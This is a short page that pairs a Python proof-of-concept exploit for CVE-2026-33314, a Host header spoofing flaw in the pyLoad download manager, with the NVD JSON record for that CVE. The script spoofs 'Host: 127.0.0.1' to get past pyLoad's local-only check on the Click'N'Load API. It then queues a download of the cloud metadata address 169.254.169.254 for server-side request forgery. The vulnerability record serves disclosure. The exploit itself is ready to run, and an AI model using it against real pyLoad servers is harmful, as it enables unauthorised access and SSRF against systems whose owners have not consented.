CVE-2026-33314

import requests def exploit_poc(target_url, ssrf_target): """ PoC for CVE-2026-33314: pyLoad Host Header Spoofing """ # The Click'N'Load API endpoint usually resides here api_endpoint = f"{target_url}/api/cnl" # Spoof the Host header to bypass @local_check decorator headers = { "Host": "127.0.0.1", "User-Agent": "CVE-2026-33314-Exploit" } # Payload to queue a download (can be internal resource for SSRF) data = { "urls": ssrf_target, "package": "PoC_Exploit" } try: print(f"[*] Sending request to {api_endpoint} with spoofed Host header...") response = requests.post(api_endpoint, headers=headers, data=data, timeout=5) if response.status_code == 200: print("[+] Request successful! Payload likely queued.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target URL target = "http://<vulnerable-pyload-host>:8000" # Replace with internal target for SSRF (e.g., http://127.0.0.1:80) internal_target = "http://169.254.169.254/latest/meta-data/" exploit_poc(target, internal_target)

{"cve": {"id": "CVE-2026-33314", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:27.690", "lastModified": "2026-03-26T12:01:09.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97."}, {"lang": "es", "value": "pyLoad es un gestor de descargas de código abierto y gratuito escrito en Python. Antes de la versión 0.5.0b3.dev97, una vulnerabilidad de suplantación de encabezado de host en el decorador @local_check permite a atacantes externos no autenticados eludir las restricciones de solo acceso local. Esto otorga acceso a los puntos finales de la API de Click'N'Load, lo que permite a los atacantes poner en cola descargas arbitrarias de forma remota, lo que lleva a la falsificación de petición del lado del servidor (SSRF) y a la denegación de servicio (DoS). Este problema ha sido parcheado en la versión 0.5.0b3.dev97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.5.0b3.dev97", "matchCriteriaId": "49DB5560-08BC-47E1-ADC3-729D9746159F"}]}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}